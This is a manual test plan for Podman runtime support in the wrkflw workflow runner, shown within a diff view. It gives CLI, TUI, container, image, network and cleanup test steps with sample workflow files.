### 2. Initialize Podman (macOS/Windows only)
|
||||
```bash
|
||||
podman machine init
|
||||
podman machine start
|
||||
```
|
||||
|
||||
### 3. Verify Podman Installation
|
||||
```bash
|
||||
podman version
|
||||
podman info
|
||||
```
|
||||
|
||||
Expected output should show Podman version and system information without errors.
|
||||
|
||||
### 4. Build WRKFLW with Podman Support
|
||||
```bash
|
||||
cd /path/to/wrkflw
|
||||
cargo build --release
|
||||
```
|
||||
|
||||
## Test Plan
|
||||
|
||||
### Test 1: CLI Runtime Selection
|
||||
|
||||
#### 1.1 Test Default Runtime (Docker)
|
||||
```bash
|
||||
# Should default to Docker
|
||||
./target/release/wrkflw run --help | grep -A 5 "runtime"
|
||||
```
|
||||
Expected: Should show `--runtime` option with default value `docker`.
|
||||
|
||||
#### 1.2 Test Podman Runtime Selection
|
||||
```bash
|
||||
# Should accept podman as runtime
|
||||
./target/release/wrkflw run --runtime podman tests/workflows/example.yml
|
||||
```
|
||||
Expected: Should run without CLI argument errors.
|
||||
|
||||
#### 1.3 Test Emulation Runtime Selection
|
||||
```bash
|
||||
# Should accept emulation as runtime
|
||||
./target/release/wrkflw run --runtime emulation tests/workflows/example.yml
|
||||
```
|
||||
Expected: Should run without CLI argument errors.
|
||||
|
||||
#### 1.4 Test Invalid Runtime Selection
|
||||
```bash
|
||||
# Should reject invalid runtime
|
||||
./target/release/wrkflw run --runtime invalid tests/workflows/example.yml
|
||||
```
|
||||
Expected: Should show error about invalid runtime choice.
|
||||
|
||||
### Test 2: Podman Availability Detection
|
||||
|
||||
#### 2.1 Test with Podman Available
|
||||
```bash
|
||||
# Ensure Podman is running
|
||||
podman info > /dev/null && echo "Podman is available"
|
||||
|
||||
# Test wrkflw detection
|
||||
./target/release/wrkflw run --runtime podman --verbose test-workflows/example.yml
|
||||
```
|
||||
Expected: Should show "Podman is available, using Podman runtime" in logs.
|
||||
|
||||
#### 2.2 Test with Podman Unavailable
|
||||
```bash
|
||||
# Temporarily make podman unavailable
|
||||
sudo mv /usr/local/bin/podman /usr/local/bin/podman.bak 2>/dev/null || echo "Podman not in /usr/local/bin"
|
||||
|
||||
# Test fallback to emulation
|
||||
./target/release/wrkflw run --runtime podman --verbose test-workflows/example.yml
|
||||
|
||||
# Restore podman
|
||||
sudo mv /usr/local/bin/podman.bak /usr/local/bin/podman 2>/dev/null || echo "Nothing to restore"
|
||||
```
|
||||
Expected: Should show "Podman is not available. Using emulation mode instead."
|
||||
|
||||
### Test 3: Container Execution with Podman
|
||||
|
||||
#### 3.1 Create a Simple Test Workflow
|
||||
Create `test-podman-workflow.yml`:
|
||||
|
||||
```yaml
|
||||
name: Test Podman Workflow
|
||||
on: [workflow_dispatch]
|
||||
|
||||
jobs:
|
||||
test-podman:
|
||||
runs-on: ubuntu-latest
|
||||
container: ubuntu:20.04
|
||||
steps:
|
||||
- name: Test basic commands
|
||||
run: |
|
||||
echo "Testing Podman container execution"
|
||||
whoami
|
||||
pwd
|
||||
ls -la
|
||||
echo "Container test completed successfully"
|
||||
|
||||
- name: Test environment variables
|
||||
env:
|
||||
TEST_VAR: "podman-test"
|
||||
run: |
|
||||
echo "Testing environment variables"
|
||||
echo "TEST_VAR: $TEST_VAR"
|
||||
echo "GITHUB_WORKSPACE: $GITHUB_WORKSPACE"
|
||||
echo "RUNNER_OS: $RUNNER_OS"
|
||||
|
||||
- name: Test volume mounting
|
||||
run: |
|
||||
echo "Testing volume mounting"
|
||||
echo "test-file-content" > test-file.txt
|
||||
cat test-file.txt
|
||||
ls -la test-file.txt
|
||||
```
|
||||
|
||||
#### 3.2 Test Podman Container Execution
|
||||
```bash
|
||||
./target/release/wrkflw run --runtime podman --verbose test-podman-workflow.yml
|
||||
```
|
||||
Expected: Should execute all steps successfully using Podman containers.
|
||||
|
||||
#### 3.3 Compare with Docker Execution
|
||||
```bash
|
||||
# Test same workflow with Docker
|
||||
./target/release/wrkflw run --runtime docker --verbose test-podman-workflow.yml
|
||||
|
||||
# Test same workflow with emulation
|
||||
./target/release/wrkflw run --runtime emulation --verbose test-podman-workflow.yml
|
||||
```
|
||||
Expected: All three runtimes should produce similar results (emulation may have limitations).
|
||||
|
||||
### Test 4: TUI Interface Testing
|
||||
|
||||
#### 4.1 Test TUI Runtime Selection
|
||||
```bash
|
||||
./target/release/wrkflw tui tests/workflows/
|
||||
```
|
||||
|
||||
**Test Steps:**
|
||||
1. Launch TUI
|
||||
2. Press `e` key to cycle through runtimes
|
||||
3. Verify status bar shows: Docker → Podman → Emulation → Docker
|
||||
4. Check that Podman status shows "Connected" or "Not Available"
|
||||
5. Select a workflow and run it with Podman runtime
|
||||
|
||||
#### 4.2 Test TUI with Specific Runtime
|
||||
```bash
|
||||
# Start TUI with Podman runtime
|
||||
./target/release/wrkflw tui --runtime podman test-workflows/
|
||||
|
||||
# Start TUI with emulation runtime
|
||||
./target/release/wrkflw tui --runtime emulation test-workflows/
|
||||
```
|
||||
Expected: TUI should start with the specified runtime active.
|
||||
|
||||
### Test 5: Container Preservation Testing
|
||||
|
||||
✅ **Note**: Container preservation is fully supported with Podman and works correctly.
|
||||
|
||||
#### 5.1 Test Container Cleanup (Default)
|
||||
```bash
|
||||
# Run a workflow that will fail
|
||||
echo 'name: Failing Test
|
||||
on: [workflow_dispatch]
|
||||
jobs:
|
||||
fail:
|
||||
runs-on: ubuntu-latest
|
||||
container: ubuntu:20.04
|
||||
steps:
|
||||
- run: exit 1' > test-fail-workflow.yml
|
||||
|
||||
./target/release/wrkflw run --runtime podman test-fail-workflow.yml
|
||||
|
||||
# Check if containers were cleaned up
|
||||
podman ps -a --filter "name=wrkflw-"
|
||||
```
|
||||
Expected: No wrkflw containers should remain.
|
||||
|
||||
#### 5.2 Test Container Preservation on Failure
|
||||
```bash
|
||||
./target/release/wrkflw run --runtime podman --preserve-containers-on-failure test-fail-workflow.yml
|
||||
|
||||
# Check if failed container was preserved
|
||||
podman ps -a --filter "name=wrkflw-"
|
||||
```
|
||||
Expected: Should show preserved container. Note the container ID for inspection.
|
||||
|
||||
#### 5.3 Test Container Inspection
|
||||
```bash
|
||||
# Get container ID from previous step
|
||||
CONTAINER_ID=$(podman ps -a --filter "name=wrkflw-" --format "{{.ID}}" | head -1)
|
||||
|
||||
# Inspect the preserved container
|
||||
podman exec -it $CONTAINER_ID bash
|
||||
# Inside container: explore the environment, check files, etc.
|
||||
# Exit with: exit
|
||||
|
||||
# Clean up manually
|
||||
podman rm $CONTAINER_ID
|
||||
```
|
||||
|
||||
### Test 6: Image Operations Testing
|
||||
|
||||
#### 6.1 Test Image Pulling
|
||||
```bash
|
||||
# Create workflow that uses a specific image
|
||||
echo 'name: Image Pull Test
|
||||
on: [workflow_dispatch]
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
container: node:18-alpine
|
||||
steps:
|
||||
- run: node --version' > test-image-pull.yml
|
||||
|
||||
./target/release/wrkflw run --runtime podman --verbose test-image-pull.yml
|
||||
```
|
||||
Expected: Should pull node:18-alpine image and execute successfully.
|
||||
|
||||
#### 6.2 Test Custom Image Building
|
||||
```bash
|
||||
# Create a workflow that builds a custom image (if supported)
|
||||
# This tests the build_image functionality
|
||||
mkdir -p test-build
|
||||
echo 'FROM ubuntu:20.04
|
||||
RUN apt-get update && apt-get install -y curl
|
||||
CMD ["echo", "Custom image test"]' > test-build/Dockerfile
|
||||
|
||||
echo 'name: Image Build Test
|
||||
on: [workflow_dispatch]
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Build and test custom image
|
||||
run: |
|
||||
echo "Testing custom image scenarios"
|
||||
curl --version' > test-custom-image.yml
|
||||
|
||||
# Note: This test depends on language environment preparation
|
||||
./target/release/wrkflw run --runtime podman --verbose test-custom-image.yml
|
||||
```
|
||||
|
||||
### Test 7: Error Handling and Edge Cases
|
||||
|
||||
#### 7.1 Test Invalid Container Image
|
||||
```bash
|
||||
echo 'name: Invalid Image Test
|
||||
on: [workflow_dispatch]
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
container: nonexistent-image:invalid-tag
|
||||
steps:
|
||||
- run: echo "This should fail"' > test-invalid-image.yml
|
||||
|
||||
./target/release/wrkflw run --runtime podman test-invalid-image.yml
|
||||
```
|
||||
Expected: Should handle image pull failure gracefully with clear error message.
|
||||
|
||||
#### 7.2 Test Network Connectivity
|
||||
```bash
|
||||
echo 'name: Network Test
|
||||
on: [workflow_dispatch]
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
container: ubuntu:20.04
|
||||
steps:
|
||||
- name: Test network access
|
||||
run: |
|
||||
apt-get update
|
||||
apt-get install -y curl
|
||||
curl -s https://httpbin.org/get
|
||||
- name: Test DNS resolution
|
||||
run: nslookup google.com' > test-network.yml
|
||||
|
||||
./target/release/wrkflw run --runtime podman --verbose test-network.yml
|
||||
```
|
||||
Expected: Should have network access and complete successfully.
|
||||
|
||||
#### 7.3 Test Resource Intensive Workflow
|
||||
```bash
|
||||
echo 'name: Resource Test
|
||||
on: [workflow_dispatch]
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
container: ubuntu:20.04
|
||||
steps:
|
||||
- name: Memory test
|
||||
run: |
|
||||
echo "Testing memory usage"
|
||||
free -h
|
||||
dd if=/dev/zero of=/tmp/test bs=1M count=100
|
||||
ls -lh /tmp/test
|
||||
rm /tmp/test
|
||||
- name: CPU test
|
||||
run: |
|
||||
echo "Testing CPU usage"
|
||||
yes > /dev/null &
|
||||
PID=$!
|
||||
sleep 2
|
||||
kill $PID
|
||||
echo "CPU test completed"' > test-resources.yml
|
||||
|
||||
./target/release/wrkflw run --runtime podman --verbose test-resources.yml
|
||||
```
|
||||
|
||||
### Test 8: Comparison Testing
|
||||
|
||||
#### 8.1 Create Comprehensive Test Workflow
|
||||
```bash
|
||||
echo 'name: Comprehensive Runtime Comparison
|
||||
on: [workflow_dispatch]
|
||||
|
||||
env:
|
||||
GLOBAL_VAR: "global-value"
|
||||
|
||||
jobs:
|
||||
test-all-features:
|
||||
runs-on: ubuntu-latest
|
||||
container: ubuntu:20.04
|
||||
env:
|
||||
JOB_VAR: "job-value"
|
||||
steps:
|
||||
- name: Environment test
|
||||
env:
|
||||
STEP_VAR: "step-value"
|
||||
run: |
|
||||
echo "=== Environment Variables ==="
|
||||
echo "GLOBAL_VAR: $GLOBAL_VAR"
|
||||
echo "JOB_VAR: $JOB_VAR"
|
||||
echo "STEP_VAR: $STEP_VAR"
|
||||
echo "GITHUB_WORKSPACE: $GITHUB_WORKSPACE"
|
||||
echo "GITHUB_REPOSITORY: $GITHUB_REPOSITORY"
|
||||
echo "RUNNER_OS: $RUNNER_OS"
|
||||
|
||||
- name: File system test
|
||||
run: |
|
||||
echo "=== File System Test ==="
|
||||
pwd
|
||||
ls -la
|
||||
whoami
|
||||
id
|
||||
df -h
|
||||
|
||||
- name: Network test
|
||||
run: |
|
||||
echo "=== Network Test ==="
|
||||
apt-get update -q
|
||||
apt-get install -y curl iputils-ping
|
||||
ping -c 3 8.8.8.8
|
||||
curl -s https://httpbin.org/ip
|
||||
|
||||
- name: Process test
|
||||
run: |
|
||||
echo "=== Process Test ==="
|
||||
ps aux
|
||||
top -b -n 1 | head -10
|
||||
|
||||
- name: Package installation test
|
||||
run: |
|
||||
echo "=== Package Test ==="
|
||||
apt-get install -y python3 python3-pip
|
||||
python3 --version
|
||||
pip3 --version' > comprehensive-test.yml
|
||||
```
|
||||
|
||||
#### 8.2 Run Comprehensive Test with All Runtimes
|
||||
```bash
|
||||
echo "Testing with Docker:"
|
||||
./target/release/wrkflw run --runtime docker --verbose comprehensive-test.yml > docker-test.log 2>&1
|
||||
|
||||
echo "Testing with Podman:"
|
||||
./target/release/wrkflw run --runtime podman --verbose comprehensive-test.yml > podman-test.log 2>&1
|
||||
|
||||
echo "Testing with Emulation:"
|
||||
./target/release/wrkflw run --runtime emulation --verbose comprehensive-test.yml > emulation-test.log 2>&1
|
||||
|
||||
# Compare results
|
||||
echo "=== Comparing Results ==="
|
||||
echo "Docker exit code: $?"
|
||||
echo "Podman exit code: $?"
|
||||
echo "Emulation exit code: $?"
|
||||
|
||||
# Optional: Compare log outputs
|
||||
diff docker-test.log podman-test.log | head -20
|
||||
```
|
||||
|
||||
## Expected Results Summary
|
||||
|
||||
### ✅ **Should Work:**
|
||||
- CLI accepts `--runtime podman` without errors
|
||||
- TUI cycles through Docker → Podman → Emulation with 'e' key
|
||||
- Status bar shows Podman availability correctly
|
||||
- Container execution works identically to Docker
|
||||
- Container cleanup respects preservation settings
|
||||
- Image pulling and basic image operations work
|
||||
- Environment variables are passed correctly
|
||||
- Volume mounting works for workspace access
|
||||
- Network connectivity is available in containers
|
||||
- Error handling is graceful and informative
|
||||
|
||||
### ⚠️ **Limitations to Expect:**
|
||||
- Some advanced Docker-specific features may not work identically
|
||||
- Performance characteristics may differ from Docker
|
||||
- Podman-specific configuration might be needed for complex scenarios
|
||||
- Error messages may differ between Docker and Podman
|
||||
|
||||
### 🚨 **Should Fail Gracefully:**
|
||||
- Invalid runtime selection should show clear error
|
||||
- Missing Podman should fall back to emulation with warning
|
||||
- Invalid container images should show helpful error messages
|
||||
- Network issues should be reported clearly
|
||||
|
||||
## Cleanup
|
||||
|
||||
After testing, clean up test files:
|
||||
```bash
|
||||
rm -f test-podman-workflow.yml test-fail-workflow.yml test-image-pull.yml
|
||||
rm -f test-custom-image.yml test-invalid-image.yml test-network.yml
|
||||
rm -f test-resources.yml comprehensive-test.yml
|
||||
rm -f docker-test.log podman-test.log emulation-test.log
|
||||
rm -rf test-build/
|
||||
podman system prune -f # Clean up unused containers and images
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Common Issues:
|
||||
|
||||
1. **"Podman not available"**
|
||||
- Verify Podman installation: `podman version`
|
||||
- Check Podman service: `podman machine list` (macOS/Windows)
|
||||
|
||||
2. **Permission errors**
|
||||
- Podman should work rootless by default
|
||||
- Check user namespaces: `podman unshare cat /proc/self/uid_map`
|
||||
|
||||
3. **Network issues**
|
||||
- Test basic connectivity: `podman run --rm ubuntu:20.04 ping -c 1 8.8.8.8`
|
||||
|
||||
4. **Container startup failures**
|
||||
- Check Podman logs: `podman logs <container-id>`
|
||||
- Verify image availability: `podman images`
|
||||
|
||||
This comprehensive testing plan should verify that Podman support is working correctly and help identify any issues that need to be addressed.
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user